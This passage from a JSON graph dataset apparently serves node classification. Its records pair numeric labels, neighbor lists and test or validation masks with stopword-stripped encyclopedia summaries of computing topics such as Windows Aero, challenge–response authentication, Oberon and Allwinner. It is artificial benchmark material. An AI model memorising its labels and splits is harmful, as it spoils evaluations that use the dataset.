    "text": "Windows_Aero:windows aero windows aero backronym authentic energetic reflective open design language introduced windows vista operating system changes made aero interface affected many elements windows interface including incorporation new look along changes interface guidelines reflecting appearance layout phrasing tone instructions text applications windows aero force development windows vista windows 7 2012 development windows 8 windows server 2012 microsoft moved design language codenamed metro aero interface unveiled windows vista complete redesign windows interface replacing windows xp luna theme release windows vista beta 1 july 2005 little shown aero public leaked builds previous user interfaces plex featured longhorn builds 3683–4042 slate first featured lab06 compile build 4042 used development reset jade builds 4074 4094 microsoft started using aero theme public builds build 5048 first build full-featured aero build 5219 build 5270 released december 2005 contained implementation aero theme virtually complete according sources microsoft though number stylistic changes introduced operating system release windows aero incorporated following features windows vista windows aero revised windows 7 several ui changes touch friendly interface many new visual effects features including pointing device gestures windows 8 windows server 2012 adopted metro design language inherit elements aero aero glass theme replaced flatter solid colored theme transparency effects removed interface aside taskbar maintains transparency longer blur effect flip 3d also removed switches metro-style apps pre-release versions windows 8 used updated version aero glass flatter squared look glass theme ultimately removed final version first time since release windows 95 microsoft completely revised user interface guidelines covering aesthetics common controls buttons radio buttons task dialogs wizards common dialogs control panels icons fonts user notifications tone text used windows vista windows 7 computers meet certain hardware software requirements aero glass theme used default primarily incorporating various animation transparency effects desktop using hardware acceleration desktop window manager dwm personalize section added control panel windows vista users customize glass effects either opaque transparent change color tinted enabling aero glass also enables new features including enhanced alt-tab menu taskbar thumbnails live previews windows flip 3d window switching mechanism cascades windows 3d effect windows 7 features refinements aero glass including larger window buttons default minimize maximize close query revised taskbar thumbnails ability manipulate windows dragging top sides screen side make fill half screen top maximize ability hide windows hovering show desktop button taskbar ability minimize windows shaking one use dwm extension aero glass theme requires video card 128mb graphics memory least 64mb video ram 1gb system ram on-board graphics supporting pixel shader 2.0 wddm-compatible drivers aero glass also available windows 7 starter available limited extent windows vista home basic automatically disabled user detected running non-genuine copy windows windows server 2008 windows server 2008 r2 also support aero glass part desktop experience component disabled default wizard 97 prevailing standard wizard design visual layout functionality used windows 98 windows server 2003 well microsoft products time frame aero wizards replacement wizard 97 incorporating visual updates match aesthetics rest aero well changing interaction flow specifically notifications allow application operating system component icon notification area create pop-up window information event problem windows first introduced windows 2000 known colloquially balloons similar appearance speech balloons commonly seen comics balloons often criticized prior versions windows due intrusiveness especially regard interacted full-screen applications games entire application minimized bubble came notifications aero aim less intrusive gradually fading appearing full-screen application screensaver displayed—in cases notifications queued appropriate time larger icons multiple font sizes colors also introduced aero notification windows segoe ui typeface default font aero languages use latin greek cyrillic character sets default font size also increased 8pt 9pt improve readability segoe ui typeface prior windows 8 numeral zero 0 narrow capital letter wider windows 8 segoe ui keeps difference numeral one 1 top hook capital letter equal crown base windows 8 1 base crown base aero base icons designed iconfactory previously designed windows xp icons vista user experience guidelines also address issue tone writing text used aero user interface prior design guidelines microsoft done much address issue user interface text phrased way information requests presented user consistent parts operating system guidelines vista applications suggest messages present technically accurate advice concisely objectively positively assume intelligent user motivated solve particular problem specific advice includes use second person active voice e.g print photos camera avoidance words like please sorry thank",
    "neighbors": [
      6150,
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      1581,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      4704,
      3170,
      8296,
      5225,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      3283,
      2782,
      11487,
      9442,
      4836,
      4326,
      2279,
      9448,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      5386,
      3856,
      11030,
      3351,
      8473,
      8985,
      11546,
      8988,
      9505,
      5413,
      5928,
      3881,
      6441,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6462,
      3394,
      3922,
      11605,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      8576,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      440,
      6584,
      1978,
      2495,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573,
      3576,
      10747
    ],
    "mask": "Test"
  },
  {
    "node_id": 6973,
    "label": 9,
    "text": "Pkfix:pkfix text-producing systems latex tex produce dvi files files written user files used moderate extent still post-processed tool called dvips converted dvi files postscript files understood many printers older versions dvips embedded bitmapped fonts represented letters symbols pictures fixed resolution instance 300 dpi files printed newer devices resolution 1200 dpi letters files bitmapped fonts display remarkably low quality jagged lines curves diagonals one solution problem substitute bitmapped fonts scalable fonts known among postscript users type 1 fonts remedy problem low quality printing one use heiko oberdiek utility called pkfix input pkfix postscript file generated dvips versions 5.58 newer output another postscript file time bitmapped fonts substituted scalable fonts possible technically speaking pkfix perl script searches postscript file comments bitmapped pk fonts introduced relatively recent dvips versions replaces corresponding type 1 fonts course simpler solution problem would reprocess latex/tex files recent tools fonts cases person given postscript file n't author document n't access source files worse source files may lost times",
    "neighbors": [
      8582,
      1609,
      5612,
      7983,
      8628
    ],
    "mask": "Test"
  },
  {
    "node_id": 6974,
    "label": 2,
    "text": "Single_address_space_operating_system:single address space operating system computer science single address space operating system sasos operating system provides one globally shared address space processes",
    "neighbors": [
      2625,
      10499,
      4423,
      7561,
      7983,
      7057,
      6706,
      7187,
      11539,
      10776,
      10809,
      4669,
      5598,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 6975,
    "label": 4,
    "text": "Challenge–response_authentication:challenge–response authentication computer security challenge–response authentication family protocols one party presents question challenge another party must provide valid answer response authenticated simplest example challenge–response protocol password authentication challenge asking password valid response correct password clearly adversary eavesdrop password authentication authenticate way one solution issue multiple passwords marked identifier verifier ask passwords prover must correct password identifier assuming passwords chosen independently adversary intercepts one challenge–response message pair clues help different challenge different time example communications security methods unavailable u.s. military uses akac-1553 triad numeral cipher authenticate encrypt communications triad includes list three-letter challenge codes verifier supposed choose randomly random three-letter responses added security set codes valid particular time period ordinarily 24 hours interesting challenge–response technique works follows say bob controlling access resource alice comes along seeking entry bob issues challenge perhaps 52w72y alice must respond one string characters fits challenge bob issued fit determined algorithm known bob alice correct response might simple 63x83z character response one challenge real world rules would much complex bob issues different challenge time thus knowing previous correct response even n't hidden means communication used alice bob use challenge-response protocols also used assert things knowledge secret value captchas example sort variant turing test meant determine whether viewer web application real person challenge sent viewer distorted image text viewer responds typing text distortion designed make automated optical character recognition ocr difficult preventing computer program passing human non-cryptographic authentication generally adequate days internet user could sure system asking password really system trying access nobody likely eavesdropping communication channel observe password entered address insecure channel problem sophisticated approach necessary many cryptographic solutions involve two-way authentication user system must convince know shared secret password without secret ever transmitted clear communication channel eavesdroppers might lurking one way done involves using password encryption key transmit randomly generated information challenge whereupon end must return response similarly encrypted value predetermined function originally offered information thus proving able decrypt challenge instance kerberos challenge encrypted integer n response encrypted integer n 1 proving end able decrypt integer n variations hash function operates password random challenge value create response value encrypted hashed exchanges directly reveal password eavesdropper however may supply enough information allow eavesdropper deduce password using dictionary attack brute-force attack use information randomly generated exchange response different challenge guards possibility replay attack malicious intermediary simply records exchanged data retransmits later time fool one end thinking authenticated new connection attempt authentication protocols usually employ cryptographic nonce challenge ensure every challenge-response sequence unique protects man-in-the-middle attack subsequent replay attack impractical implement true nonce strong cryptographically secure pseudorandom number generator cryptographic hash function generate challenges highly unlikely occur sometimes important use time-based nonces weaken servers different time zones servers inaccurate clocks also important use time-based nonces synchronized clocks application vulnerable delayed message attack attack occurs attacker copies transmission whilst blocking reaching destination allowing replay captured transmission delay choosing easily accomplished wireless channels time-based nonce used limit attacker resending message restricted expiry time perhaps less one second likely effect upon application mitigating attack mutual authentication performed using challenge-response handshake directions server ensures client knows secret client also ensures server knows secret protects rogue server impersonating real server challenge–response authentication help solve problem exchanging session keys encryption using key derivation function challenge value secret may combined generate unpredictable encryption key session particularly effective man-in-the-middle attack attacker able derive session key challenge without knowing secret therefore able decrypt data stream avoid storage passwords operating systems e.g unix-type store hash password rather storing password authentication system need verify hash password entered matches hash stored password database makes difficult intruder get passwords since password stored difficult determine password matches given hash however presents problem many challenge-response algorithms require client server shared secret since password stored challenge-response algorithm usually use hash password secret instead password case intruder use actual hash rather password makes stored hashes sensitive actual passwords scram challenge-response algorithm avoids problem examples sophisticated challenge-response algorithms people consider captcha kind challenge-response authentication blocks spambots",
    "neighbors": [
      7556,
      7557,
      519,
      6035,
      1945,
      1054,
      2080,
      7212,
      1069,
      3629,
      6064,
      5433,
      6098,
      2003,
      2527,
      5857,
      2274,
      10341,
      2928,
      7794,
      5492,
      8694,
      119,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 6976,
    "label": 3,
    "text": "The_Hobbit_(1982_video_game):hobbit 1982 video game hobbit illustrated text adventure computer game released 1982 zx spectrum home computer based book hobbit j. r. r. tolkien developed beam software philip mitchell dr. veronika megler published melbourne house later converted home computers available time including commodore 64 bbc micro oric computers arrangement book publishers copy book included game sold parser advanced time used subset english called inglish released adventure games used simple verb-noun parsers allowing simple phrases like get lamp inglish allowed player type advanced sentences ask gandalf curious map take sword kill troll parser complex intuitive introducing pronouns adverbs viciously attack goblin punctuation prepositions allowing player interact game world ways previously possible many locations illustrated image based originals designed kent rees tape version save space image stored compressed format storing outline information flood filling enclosed areas screen slow cpu speed meant would take several seconds scene draw disk-based versions game used pre-rendered higher-quality images game innovative text-based physics system developed veronika megler objects including characters game calculated size weight solidity objects placed inside objects attached together rope damaged broken main character sitting barrel barrel picked thrown trapdoor player would go unlike works interactive fiction game also real time insofar period idleness causes wait command automatically invoked possibility events occurring result suppressed entering pause command stops events key pressed game cast non-player characters npcs entirely independent player bound precisely game rules loyalties strengths personalities affect behaviour always predicted character gandalf example would roam freely around game world fifty locations picking objects getting fights captured volatility characters coupled rich physics impossible-to-predict fighting system enabled game played many different ways though would also lead problems important character killed early numerous possible solutions hindsight game might regarded one first examples emergent gameplay also resulted however many bugs example development megler found animal npcs killed player arrived game documentation warned due immense size complexity game impossible guarantee ever completely error-free melbourne house issued version 1.1 fixes another bug resulted game unwinnable forcing release version 1.2 company never fixed bugs info 1985 rated hobbit commodore 64 three-plus stars five stating graphics pleasant show-stoppers game parser puzzles typical adventures today magazine concluded tolkien fans likely pleased title hobbit bestseller uk zx spectrum 1983 c64 bbc following year game 1983 golden joystick award best strategy game game also huge commercial success selling 100,000 copies first two years retail price £14.95 records sales figures article march 1985 estimated range 100,000 200,000 figure 500,000 copies possible making excellent candidate bestselling text adventure time challenged infocom ’ zork use images many locations opposed mostly text-only adventure games time flexibility inglish parser innovative independence non-player characters popularity tolkien work attributed game phenomenal success help players book called guide playing hobbit david elkan published 1984 developer beam software followed hobbit 1985 1987 shadows mordor game two lord rings 1989 crack doom would also reuse inglish sherlock 1986 parody game released crl boggit phrase game entered popular culture thorin sits starts singing gold also game mentioned nick montfort twisty little passages book exploring history form interactive fiction genre discworld noir references hobbit protagonist lewton discovers someone concealed wine barrel wonders brings mind phrases wait – time passes thorin sits starts singing gold",
    "neighbors": [
      9006,
      11666,
      5399,
      952,
      5628
    ],
    "mask": "Test"
  },
  {
    "node_id": 6977,
    "label": 9,
    "text": "PDF/VT:pdf/vt pdf/vt international standard published iso august 2010 iso 16612-2 defines use pdf exchange format optimized variable transactional printing built top pdf/x-4 first variable-data printing vdp format ensures modern international color consortium-based icc color management use icc output intents adds notion encapsulated groups graphic objects support optimized efficient processing repeating text graphic image content introducing concept document part metadata dpm enables reliable dynamic management pages high volume transactional output hvto print data like record selection postage optimization based metadata pdf/vt-1 always consists self-contained file variants standard support use external graphic content pdf/vt-2 well streaming use multi-part mime packages pdf/vt-2s addition digital master vdp printing shared viewed interactively navigated human operators using normal pdf reader though completely accurate rendering requires pdf/x-4 pdf/vt conforming viewer number vendors announced support pdf/vt upon publication standard 2010 subsequent years various pdf/vt-consuming -producing products also reached market ubiquity pdf well fact pdf iso standard iso 32000-1:2008 clearly work favor pdf/vt nevertheless currently difficult predict industry pdf/vt adopted fast happen positioned vis-à-vis formats architectures variable data printing practical requirements benefits pdf/vt explained detail along related recommendations guide global graphics. ref name= dopdf/vtright /ref",
    "neighbors": [
      10752,
      5384,
      8854,
      11036,
      5149,
      2206,
      9245,
      5413,
      10413,
      11056,
      8627,
      3126,
      1079,
      5816,
      11074,
      8904,
      1610,
      9290,
      8524,
      2519,
      2904,
      4058,
      4064,
      8421,
      8426,
      5614,
      1010,
      3447,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 6978,
    "label": 3,
    "text": "Puma_(microarchitecture):puma microarchitecture puma family 16h low-power microarchitecture amd apus succeeds jaguar second-generation version targets market belongs amd architecture family 16h beema line processors aimed low-power notebooks mullins targeting tablet sector puma cores use microarchitecture jaguar inherits design like jaguar puma core support following instruction sets instructions mmx sse sse2 sse3 ssse3 sse4a sse4.1 sse4.2 avx f16c clmul aes bmi1 movbe move big-endian instruction xsave/xsaveopt abm popcnt/lzcnt amd-v. amd released revision puma core puma+ part carrizo-l platform 2015 differences cpu microarchitecture unclear puma+ featured 2 4 cores 2.5ghz required newer fp4 socket",
    "neighbors": [
      3585,
      3586,
      3588,
      6151,
      5645,
      11282,
      10260,
      4124,
      7712,
      2088,
      8237,
      2094,
      6705,
      8250,
      7234,
      11331,
      2635,
      7247,
      7783,
      7788,
      8815,
      1137,
      1651,
      638,
      8322,
      11396,
      8327,
      10375,
      1682,
      9369,
      666,
      2719,
      4767,
      9400,
      9913,
      10945,
      3783,
      2764,
      9427,
      5844,
      5859,
      2788,
      5356,
      9964,
      1776,
      6391,
      9475,
      5380,
      8452,
      4872,
      6925,
      6926,
      7963,
      2850,
      11047,
      1322,
      1329,
      3892,
      1849,
      833,
      6978,
      6981,
      9541,
      11080,
      9551,
      6495,
      1377,
      9057,
      4451,
      9581,
      9582,
      11130,
      9092,
      3464,
      398,
      7058,
      2463,
      9122,
      5541,
      11183,
      8629,
      3511,
      8125,
      8126,
      9157,
      977,
      7122,
      473,
      2524,
      2525,
      7132,
      1005,
      10734,
      7151,
      499,
      2549,
      4603,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 6979,
    "label": 2,
    "text": "Oberon_(operating_system):oberon operating system oberon system modular single-user single-process multitasking operating system written programming language name originally developed late 1980s eth zürich oberon system unconventional visual text user interface instead conventional cli gui tui innovative time influenced design acme text editor plan 9 bell labs operating system oberon system still maintained also subsequently developed multi-process smp-capable bluebottle operating system zooming user interface oberon operating system originally developed part ns32032-based ceres workstation project written almost entirely since 2013 edition described entirely oberon programming language basic system designed implemented niklaus wirth jürg gutknecht design implementation fully documented book project oberon user interface programmers reference found martin reiser book oberon system later extended ported hardware team eth-zürich recognition popular magazines wirth gutknecht although active computer science professors referred 'part-time programmers book 'project oberon late 2013 couple months 80th birthday niklaus wirth published second edition project oberon details implementation oberon system using risc cpu design realized xilinx fpga board presented symposium organized 80th birthday ethz meantime several emulators version implemented according josef templ former member developer group eidgenössische technische hochschule zürich later member institut für systemsoftware johannes kepler university linz one versions v4 maintained genealogy different versions oberon system following oberon text user interface tui differentiated terminal user interface combines point-and-click convenience graphical user interface gui linguistic strength command line interface cli closely tied naming conventions oberon language text appearing almost anywhere screen edited therefore used command input commands activated middle-mouse click text fragment form module.command optionally followed parameters terminated command defined procedure empty argument list parameters command defined executing middle click must explicitly scanned retrieved procedure checks questions asked command execution sometimes called non-modal user interface ui nothing like command prompt required although radically different command line tui efficient powerful steep ascent early learning curve makes little bit difficult beginning questions asked deliberate design decision needs getting used editors ask user closing modified text case oberon system usage tui programming interface fully documented martin reiser book oberon system short introduction user interface found niklaus wirth home page later versions system oberon oberon v4 v4 short sometimes also referred linz-oberon oberon system 3 s3 sometimes also called eth-oberon spirit oberon enhanced basic interface different incompatible implementations buttons drop menus active elements v4 used purpose dedicated control character embedded normal text contrast system 3 extended kernel introducing persistent objects extensions include large set user interface elements mastering oberon user interface purely textual also called gadgets system s3 absolutely non-trivial therefore recommended proceed successful installation oberon system 3 andré fischers oberon system 3 tutorial expanded version tutorial published book print whole book available electronic form single user license every installed version system 3 windows linux native i.e also gadgets toolkit olr information get copy oberon companion may found section oberon wikibook similar user interfaces yet appear commonplace operating systems rob pike acme system plan 9 bell labs strongly inspired oberon tui whether worksheet interface macintosh programmer workshop influenced oberon tui vice versa difficult decide oberon system based wirth previous computer design lilith apple macintosh precursor lisa oberon system ceres precursor lilith roots inspired alto developed xerox parc v1 first usable version time oberon trilogy published major change text model together editor called write yielded v2 foreshadowed table section history major fork beginning 1990s v4 vs. system 3 group around jürg gutknecht introduced persistent objects object-libraries thereby extending kernel group around realized similar features introducing active elements mapped special character thereby extending fonts without changing kernel system 3 sometimes also called spirit oberon later renamed eth oberon whereas v4 sometimes also called linz oberon version oberon system 3 integrated microsoft windows os called plugin oberon version called oberon v4 see also history closer original operating system developed n. wirth j. gutknecht originally developed ethz h.p mössenböck went institut für systemsoftware johannes-kepler university linz jku development v4 moved also therefore v4 sometimes also called linz-oberon contrast eth-oberon recent version v4 extensions available jku oberon v4 appears orphaned almost changes since 2000 another repository v4 claudio nieder oberon v4 also shows difference different v4 implementations since 2013 page moved to/is mirrored sourceforge v4 closer would called integrated development environment operating system many extensions written v4 still available ftp server ssw jku documentation found web-pages information normally included packages given oberon special rich text format computer science department eth zurich recent years begun exploring active objects concurrency operating systems released early version new language active oberon new operating system first called aos — due copyright issues — called a2 and/or bluebottle available eth zurich source via internet native versions a2 i.e running bare hardware currently possible intel ia-32 x86-64 single- multi-processor systems strongarm cpu family versions running top another operating system available windows winaos unix unixaos linux linuxaos os-x darwinaos part industrial research project native systems group eth zurich developed application-specific operating system called stailaos based latest version oberon os targeted towards applications like real-time analytics high performance trading systems main memory based erp etc native oberon stands oberon system running bare hardware pc-native oberon version oberon operating system runs ia-32 x86-32 pc hardware never v4 native oberon every information section implicitly assumes system 3 native oberon minimal hardware requirements 133 mhz pentium 100mb hard disk vesa 2 graphics card resolution least 1024x768 pixel optionally 3com network card basic system runs single hd-floppy additional software installed network full installation includes gadgets gui written completely oberon programming language confusion caused fact exists version called lno acronym linux native oberon uses linux hardware abstraction layer hal goal compatible possible pc-native oberon versions oberon system i.e without native name partially modified interfaces low level modules 2015 peter matthias revitalized lno name olr oberon linux revival multi-platform distribution running seamlessly intel x86 risc-v mips arm runs nicely raspberry pi inexpensive chip computer tweaking adjusting group membership or/and permissions devices runs nicely tiny core linux olr interfaces linux kernel direct system calls olr currently mid 2017 misses network layer 2013 niklaus wirth paul reed completed re-implementation original oberon system digilent xilinx spartan 3 fpga starter board work included revision project oberon identified project oberon new edition 2013 system since ported xilinx spartan 6 fpga development board saanlima electronics 2015 paul reed collaborated victor yurkovsky creation oberonstation xilinx spartan 3-based computer designed specifically run oberon peter de wachter implemented emulator also ported java javascript michael schierl running modern browsers ported free pascal/ultibo markus greim andreas pirklbauer maintains experimental version extensions project oberon 2013 github a2 yet another name active object system 2003. br alo arm linux oberon lno family arm cpu. br aos active object system 2002. br bb blackbox component builder component pascal ide oberon microsystems. br bluebottle os another name active object system 2003. br cp component pascal dialect oberon family similar oberon-2. br etho oberon developed eidgenössische technische hochschule eth zürich. br fox compiler active oberon appearing aos a2 bluebottle br leo linux eth oberon etho 2.4.3 linux x86. br lno linux native oberon. br native oberon oberon running bare hardware rather atop another operating system. br olr oberon linux revival version uses linux hal runs x86 arm mips. br op2 portable oberon-2 compiler op2 developed port oberon onto commercially available platforms. br paco scope parallel compiler appears a2 compiles scope independent thread br risc5 cpu project oberon 2013 based upon wirth risc architecture confused risc-v. br unixaos unix-based aos. br winaos windows-based aos. br",
    "neighbors": [
      2179,
      3587,
      5380,
      6801,
      4114,
      6675,
      8082,
      9107,
      8219,
      5663,
      1952,
      10789,
      7983,
      2224,
      9391,
      10548,
      823,
      8248,
      1849,
      6716,
      8508,
      6979,
      8262,
      213,
      11221,
      7775,
      9320,
      5356,
      9964,
      1776,
      6128,
      499,
      5492,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 6980,
    "label": 4,
    "text": "Impermium:impermium impermium cyber-security startup company based redwood city california provided anti-spam account protection services internet web sites 2014 company acquired google company founded 2010 mark risher vishwanath ramarao naveen jamal met managing anti-spam systems yahoo mail company protected 1.5 million sites worldwide including disqus livefyre pinterest squarespace tumblr attacks including fraudulent registrations login account hijacking malicious user-generated content forms social spam impermium received venture capital financing funds including accel partners greylock partners highland capital partners morado ventures social+capital partnership january 2014 google announced acquisition company merging team technology anti-spam group",
    "neighbors": [
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6981,
    "label": 3,
    "text": "Allwinner_Technology:allwinner technology allwinner technology fabless semiconductor company designs mixed-signal systems chip soc company headquartered zhuhai guangdong china sales technical support office shenzhen guangdong logistics operations hong kong since founding 2007 allwinner released fifteen soc processors use android-based tablets well smartphones over-the-air ott boxes video camera systems car dvrs car media players 2012 2013 allwinner number one supplier terms unit shipments application processors android tablets worldwide according digitimes q4 2013 allwinner lost number one position terms unit shipments chinese market rockchip q2 2014 allwinner reported digitimes third largest supplier chinese market rockchip mediatek digitimes also projected allwinner fall number four position q4 2014 passed intel allwinner unit shipments continue decline series processors used mobile applications mainly referring tablet application 2011 company became arm processor licensee subsequently announced series arm cortex-a8 powered mobile application processors including a10 a13 a10s a12 used numerous tablets also pc-on-a-stick media center devices also adopted free hardware projects like cubieboard development board december 2012 allwinner announced availability two arm cortex-a7 mpcore powered products dual-core allwinner a20 quad-core allwinner a31 production a31 started september 2012 end products mostly high-end tablets chinese manufacturers appeared market early 2013 including onda v972 allwinner first make arm processor core available mass production march 2013 allwinner launched quad-core phablet processor a31s based quad-core cortex-a7 cpu architecture processor allows 3g 2g lte wifi bt fm gps agps nfc using minimum external components october 2013 allwinner released second dual-core a23 touted efficient dual core processor tablets a23 cpu frequency intended run 1.5 ghz june 2014 allwinner announced a33 quad-core soc pin compatible allwinner a23 new soc features four cortex-a7 cores 256 kb l1 cache 512 kb l2 cache mali-400 mp2 gpu new feature support openmax api allwinner positioned a33 entry-level tablets targeting quad-core tablets priced 30 60 july 2014 announced started mass production chip sell low 4 per unit april 2019 allwinner announced a50 28nm quad-core soc a50 features four cortex-a7 cores running 1.8ghz 512 kb l2 cache mali-400 mp2 gpu june 2017 allwinner announced a63 28nm quad-core soc apc 2017 conference a63 features four cortex-a53 cores running 1.8ghz 512 kb l2 cache mali-t760 mp2 gpu opengl es 3.2 support vpu 4k/6k vp9 h.265 h.264 4k 30fps video decoder h.264 hp encoder 1080p 30fps october 2013 allwinner disclosed upcoming octa-core a80 soc featuring four high-performance arm cortex-a15 four efficient arm cortex-a7 cpu cores big.little configuration june 30 2014 chinese brand onda officially released octa-core onda v989 tablet based allwinner a80 first allwinner a80-based tablet available consumers priced cny 1099 ~us 177 september 2014 allwinner announced allwinner a83t octa-core tablet processor packs eight highly energy-efficient cortex-a7 cores run simultaneously around 2.0 ghz also includes powervr gpu first tablet chip expected hit market q4 2014 april 2019 allwinner announced roadmap 2019 2020 feature a100 a200 a300 a301 soc allwinner a200 descrided “ ai blessing computational power ” f series processors based allwinner ’ melis os mainly used smart video radios video mp5 etc 2007 2011 allwinner introduced f-series processors including f10 f13 f18 f20 f1e200 f1c100 f20 series runs allwinner in-house operating system melis2.0 mainly used vehicle multimedia systems e-ink readers video intercom systems h-series introduced 2014 integrated application processors primarily targeted ott set-top box applications eg hdmi mini pcs gaming boxes etc allwinner launched a80 octa-core ott box solution targeting high-end ott box market launched allwinner h8 octa-core processor mid-range ott boxes recently launched quad-core allwinner h3 targeting us 35 50 ott box market r “ real-time series chip designed low power applications timing critical must done edge rather fog cloud chip also built redundancies meet industrial automotive standards processing r series chip applicable number different industries including industrial automation safe plcs power generation distribution healthcare automotive technology technology specifically r16 chip also utilised robotic vacuums smart speakers resulting longterm partnership cogobuy group ’ subsidiary ingdan cogobuy ’ preparatory k-system used basis add integrated slam modules allwinner chip ’ technical advantages patents cogobuy held allowed chip localisation edge computing required ai room mapping cleaning r40 r16 technology implemented number banana pi models r8 chip also used “ world ’ first nine dollar computer ” kickstarter project 2015 v-series video encoding processor targeting applications smart dvr ip camera smart home applications similar series soc adds support functions digital watermarking motion detection video scaling well cbr/vbr bit rate control mode july 2014 allwinner announced first 64-bit tablet processor hit market soon allwinner soc family includes a-series intended android os f-series intended company self-developed melis operating system a-series including a10 a20 a31 socs proprietary in-house designed multimedia co-processing dsp digital signal processing processor technology hardware accelerated video image audio decoding called cedarx subprocessing called cedarv video decoding cedara audio decoding able decode 2160p 2d 1080p 3d video main disadvantages cedarx technology associated libraries allwinner cedarx proprietary libraries clear usage license even source code versions available terms-of-use unknown open source software glue code multimedia frameworks gnu/linux systems could used middle-ware like example openmax vaapi a-series integrated application processors primarily targeting tablets well targeting mini pcs development boards tv boxes h-series introduced 2014 primarily targeted ott set-top box applications allwinner technology cooperates around ten independent design houses idhs based shenzhen china develop solutions based allwinner processors include inet technology worldchip digital technology sochip technology topwise communication chiphd technology highcharacter science technology wits technology ococci technology next huawen technology qi hao digital technology apart white-box market allwinner processors also found many brand products including hp msi zte noox gotab skyworth mele polaroid micromax archos texet ainol onda ramos teclast ployer readboy noah rf bmorn apical astro queo etc due low price a10 soc fact special rescue mode early availability u-boot linux kernel source several device makers allwinner socs popular among open-source software developers since least 2012 linux-sunxi community one active arm soc communities slightly older hardware minimal dependence firmware blobs since allwinner also official member linaro group nonprofit engineering consortium aimed developing open-source software arm architecture however noted contributions allwinner made linaro group form binary blobs clear violation gnu gpl license linux kernel uses december 2014 allwinner released android 5.0 sdk allwinner a33 quad-core solution allwinner accused multiple times violating gpl license providing linux/android kernel source code u-boot source using lgpl-licensed code within binary blobs etc allwinner also accused including backdoor published version linux kernel backdoor allows installed app full root access system may remnant debugging development process presents significant security risk devices using allwinner provided kernel",
    "neighbors": [
      3585,
      11282,
      9235,
      11289,
      4124,
      10784,
      1057,
      38,
      4139,
      3117,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      10303,
      7745,
      7747,
      2635,
      4194,
      99,
      107,
      8812,
      4211,
      5237,
      10361,
      9851,
      638,
      644,
      11396,
      8842,
      7309,
      146,
      659,
      1682,
      7833,
      666,
      154,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      6878,
      2788,
      3301,
      9964,
      8438,
      6391,
      3835,
      2814,
      781,
      6925,
      2838,
      6949,
      5417,
      810,
      2862,
      7983,
      7988,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      9541,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      4964,
      877,
      9581,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      410,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      5617,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 6982,
    "label": 5,
    "text": "Internet_Citizen's_Band:internet citizen band internet citizen band better known icb early internet chat program associated protocol released 1989 icb typically served port 7326 first version icb program called forumnet fn written university kentucky staffer sean carrick casey widely used university kentucky georgia tech mit university new mexico stanford university mills college uc santa cruz uc berkeley fn based mud software program casey established protocol clients fn used realtime communications channel 1989 loma prieta earthquake internet access hard-hit santa cruz returned service reliable phone service march 1991 university kentucky changed policy shut fn server within 2 months new server created client software another fn user john atwood devries put online renamed icb new server code unrelated original server except common client software source used basis many icb servers follow 1995 2000 server code heavily rewritten stability additional features jon luini michel hoche-mong remains available icb.net web site icb still operation dedicated user base variety clients exist major operating systems icb features many standard chat program functions including channels private messages nickname registration common clients support tcl scripting commands functions clients principally icbm support scripting perl instead icb never supported multi-server shared groups number simultaneous users always somewhat limited comparison popular chat programs icb support transferring files multimedia via chat program however restrictive protocol small remote attack surface icb protocol 8-bit clean",
    "neighbors": [
      10242,
      5251,
      5382,
      8582,
      4746,
      1036,
      11408,
      3228,
      10271,
      3105,
      9511,
      1962,
      9519,
      692,
      8758,
      1467,
      6208,
      1218,
      8386,
      2760,
      2892,
      4318,
      3812,
      4068,
      6628,
      7019,
      7928,
      10748
    ],
    "mask": "Test"
  },
  {
    "node_id": 6983,
    "label": 1,
    "text": "Elementary_key_normal_form:elementary key normal form elementary key normal form eknf subtle enhancement third normal form thus eknf tables 3nf definition happens one unique compound key overlap cases cause redundant information overlapping column table eknf elementary functional dependencies begin whole keys end elementary key attributes every full non-trivial functional dependency form x→y either x key part elementary key definition elementary functional dependency functional dependency x→a functional dependency x'→a also holds x strict subset x elementary key key x x→a elementary functional dependency attribute a. eknf defined carlo zaniolo 1982 example table whose highest normal form eknf see boyce–codd normal form achievability bcnf",
    "neighbors": [
      5792,
      5794,
      5795,
      2022,
      2024,
      2025,
      2026,
      4281,
      3004,
      6782
    ],
    "mask": "Test"
  },
  {
    "node_id": 6984,
    "label": 2,
